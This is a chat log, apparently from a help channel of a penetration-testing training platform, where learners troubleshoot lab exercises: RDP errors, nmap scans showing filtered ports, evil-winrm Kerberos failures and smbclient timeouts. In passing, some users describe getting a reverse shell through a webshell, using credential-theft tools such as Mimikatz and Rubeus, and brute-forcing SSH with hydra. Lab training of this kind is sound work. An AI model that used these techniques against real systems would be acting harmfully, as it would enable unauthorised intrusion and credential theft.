[19:14:35:409] [14773:000039b7] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0
[19:14:35:409] [14773:000039b7] [WARN][com.freerdp.crypto] - [verify_cb]: CN = WINMEDIUM
Domain: WINMEDIUM
Password:
[19:14:46:966] [14773:000039b7] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Remote framebuffer format fusermount3: mounting over filesystem type 0x858458f6 is forbidden
[19:15:20:137] [14773:000039b7] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 110: Die Wartezeit fΓΌr die Verbindung ist abgelaufen
[19:15:20:137] [14773:000039b7] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[19:15:20:142] [14773:000039b7] [ERROR][com.freerdp.core.transport] - [transport_default_write]: BIO_should_retry returned an error: error:80000020:system library::DatenΓΌbergabe unterbrochen (broken pipe)
[19:15:20:142] [14773:000039b7] [INFO][com.freerdp.client.common] - [client_auto_reconnect_ex]: Network disconnect!

Any idea, how to get connected?

scarlet dock
#

have u tried to put /cert-ignore ?

rugged parrot
#

problem persists with any of both /cert:ignore and /cert:tofu

#

with any of both clients xfreerdp and remmina

dull solar
#

When they ask you to use apt-cache search impacket to find info about "impackets".
Why not use apt search impacket instead?? Given what I found is that apt-cache is more legacy and the newer apt combines the features of apt-get and apt-cache. Correct me if I'm wrong.
Module - Linux Fundamentals Section: Package Management Subsection: Questions

opal shuttle
#

Hii, i am doing AD SKILL ACCESSMENT 1 FROM cpts path they give us antak webshell, i pasted powershell one liner to get reversal and I successfully got reverse shell, but when i transferred tools like rubeus mimikatz nothing is working

#

I tried powerview

#

Its also not working

#

Any idea what should i do

regal kayak
dull solar
#

I used that, because I was told to use that in the section.

elfin gate
#

Is this the place where we talk about today's retire mechine we supposed to hack ?

regal kayak
#

Got ya. I still use apt-cache with some grep magic in a bash script to search for packages.

scarlet dock
dull solar
regal kayak
old cargo
#

Hello

sand kindle
#

Hello

Am I the only one who struggles on DNS Tunneling with Dnscat2 juste because the box is soooooooo unstable, il can't keep my rdp for like 2 minutes long

elfin gate
storm elk
#

You’ll get access to;)

regal kayak
elfin gate
nimble condor
#

guys im new in this server how to talk in general ??

storm elk
scarlet dock
#

Password Craking - Skills Assesment
What is hash Nexura/Administrator

i am inside the DMZ and i set the proxy for execute inside the DMZ from my machine but i don't know how access to an internal host

some hint ?
please i'm really stuck

tepid oyster
#

Anyone here?

glad flicker
#

no

rugged swan
#

Can anyone help with the pass the Certificate first question? I receive the following error when attempting to connect via evil-winrm

evil-winrm -i DC01.INLANEFREIGHT.LOCAL -r INLANEFREIGHT.LOCAL

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL'

Error: Exiting with code 1

cloud urchin
#

Do you have inlanefreight.local in your hosts file?

rugged swan
cloud urchin
# rugged swan nope. Should I? How do I know what's the related ip address?

By the time you hit that module you should know how to do it, you may want to consider taking some of the OS fundamental modules before diving in deeper to stuff. The IP you spawn when you click "Spawn target" usually has a hostname associated with it, I'm assuming that's the hostname for the target you spawned in that module.

#

Some exercises require being able to resolve a hostname

rugged swan
cloud urchin
rugged swan
#

I got what you said and I was able to grab the flag thanks. However that was a big assumption

cloud urchin
#

It's pretty normal

#

A lot of tools require being able to resolve the host, especially AD stuff

nimble condor
#

nmap -sV -sC -p- -Pn 10.129.58.177
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-08-24 20:54 +01
Nmap scan report for 10.129.58.177
Host is up (0.11s latency).
All 65535 scanned ports on 10.129.58.177 are in ignored states.
Not shown: 50326 filtered tcp ports (no-response), 15209 filtered tcp ports (time-exceeded)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.95 seconds
im trying to complete a htb module
i found no solution on google

shut wraith
#

All links broken -- Wront documentation links

shut wraith
#

The content in the module guide is completely different than the environment

cloud urchin
#

No idea what you're talking about but please don't reveal content from modules above tier 0

shut wraith
#

sry

nimble condor
#

Answer the question(s) below to complete this Section and earn cubes!

Target(s): 10.129.58.163 (ACADEMY-GETSTART-SVCSCAN)

Life Left: 118 minute(s)

  • 1 Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?
#

here is the question

cloud urchin
nimble condor
#

i can't spawn instance

cloud urchin
#

Why

nimble condor
#

i have none leftNotLikeThis

cloud urchin
#

you mean pwnbox?

nimble condor
#

yes

cloud urchin
#

VM is a much better experience anyway

nimble condor
#

i got it working but it dont show version

north sage
#

I’m having trouble with the pwnbox.
The input USER anonymous[Ctrl + V] [Enter][Enter] doesn’t work in any way.

Can someone help ?

cloud urchin
#

You can't just paste into the Pwnbox, you have to use the copy/paste function in the lower right corner

#

It opens the clipboard and lets you input things in there

nimble condor
#

8080/tcp filtered http-proxy time-exceeded from 81.192.249.78 ttl 251

#

it don't show version

north sage
#

Okay I try tomorrow. Thank you ❀️

nimble condor
#

help plssadglas

nimble condor
#

nmap --reason -dd -sV 10.129.58.163

#

i used this line

cloud urchin
#

You will get much better help if you include the module, section, and question you're on.

nimble condor
#

ok wait

cloud urchin
nimble condor
#

yes

#

nmap -sV 10.129.157.188
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 22:02 +01
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.47 seconds

#

it shows this

cloud urchin
#

okay, so you're not doing what was shown. When you run it like that, it only scans the top 1000 ports

#

Try specifying the port to find info about that specific port

nimble condor
# cloud urchin okay, so you're not doing what was shown. When you run it like that, it only sca...

nmap -sV -Pn -p 8080 10.129.157.188
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 22:06 +01
Nmap scan report for 10.129.157.188
Host is up (0.032s latency).

PORT STATE SERVICE VERSION
8080/tcp filtered http-proxy

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.96 seconds

#

stil no versinon

cloud urchin
#

Maybe try the -A flag

nimble condor
#

nmap -sV -Pn -p 8080 -A 10.129.157.188
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 22:10 +01
Nmap scan report for 10.129.157.188
Host is up (0.028s latency).

PORT STATE SERVICE VERSION
8080/tcp filtered http-proxy
Too many fingerprints match this host to give specific OS details

cloud urchin
#

Could be a version thing, not sure

nimble condor
#

is there a solution

cloud urchin
#

Are you using the pwnbox?

nimble condor
#

no

cloud urchin
#

maybe try visiting the port in a browser or use netcat or something

#

maybe try using the pwnbox, it may have a different version of nmap that gives different results

nimble condor
#

normal kali

#

i cant use pwnbow

#

only tomorrow

random cedar
#

This is definitely an early on question but in the Networking portion of the academy it asks "What type of network cable is used to transmit data over long distances with minimal signal loss?" I've tried various versions of fiber optic and ethernet but keeps on coming back negative.

Not sure if I'm missing something or somehow just off base enough to not get this one. Any suggestions would be awesome

cloud urchin
random cedar
#

Network Foundations/Components of a Network, it's the first question in that section, and I don't know if I'm missing something simple or what the deal is. Worked past that section without any issues, just dumbfounded as to what it would be if not fiber optic

random cedar
#

No format specified, I've tried a number of different formats though with no luck

valid gate
#

Hey does anybody have some pointers for the Attacking FTP section of Attacking Common Services in the CPTS course?

I ran my NMAP scan against ALL ports with -p- but there arent any open ports serving FTP, so instead I'm attempting to brute force SSH with hydra and the user and pw list from the resources section, but it says it could over an hour to try every combo 🫠

What's the right approach for this section if I might ask? Just need a hint

nimble condor
#

smbclient -L 10.129.58.163 -U bob
do_connect: Connection to 10.129.58.163 failed (Error NT_STATUS_IO_TIMEOUT)

#

im still on that same module

cloud urchin
#

That's a connection error

nimble condor
#

i do have connection

cloud urchin
#

You were using pwnbox at one point right? You don't want to use both at the same time. If you used both, reset the target and maybe reconnect to the VPN

#

yeah but that's a timeout error, network related

#

so reset everything

nimble condor
#

ok ill do that

valid gate
#

Is the Attacking FTP module broken? Saw some other people were having issues with it in here too. Some recommend connecting to the SSH service to try to start FTP, and others say to keep resetting the target until FTP shows up on an open port?

nimble condor
#

i did reset the target but nothing

#

smbclient -L 10.129.89.230 -U bob
do_connect: Connection to 10.129.89.230 failed (Error NT_STATUS_IO_TIMEOUT

#

its filtered

#

can someone give me answer

silk lagoon
#

did you even login correctly?

nimble condor
#

where

silk lagoon
#

did you connect to the right share and logging in with the correct user:password?

nimble condor
#

yes

fathom pendant
#

timeout
This is a connection error

nimble condor
#

i know

#

but is there any solution

fathom pendant
normal dagger
#

Has anyone done ntlm relay attacks, i cant finish question 4 πŸ˜’πŸ˜’

gray yacht
sharp notch
broken crescent
#

Hi Bro

indigo mirage
#

Hello, could you please help me with this:

#

There is something missing in the answer but, I don't get it

valid gate
#

might find it there

#

or capital R maybe

normal dagger
#

@gray yacht I figured it out, thanks tho

indigo mirage
#

I will try

#

Is not working

valid gate
#

okay yea I would check that reading module i mentioned then if you have access

sharp notch
#

get-help getCHildItem or something like that

indigo mirage
#

I think my answer is correct but I need to connect my answer with something that I haven't found yet

sharp notch
#

make sure you put yourself in ps right

indigo mirage
#

that is right, fundamental lessons

sharp notch
#

a modifier is what you add to the cmdlet

#

do get-help getchilditem it should say the modifiers to use and how they work

indigo mirage
#

According to me, should be -Recurse or -File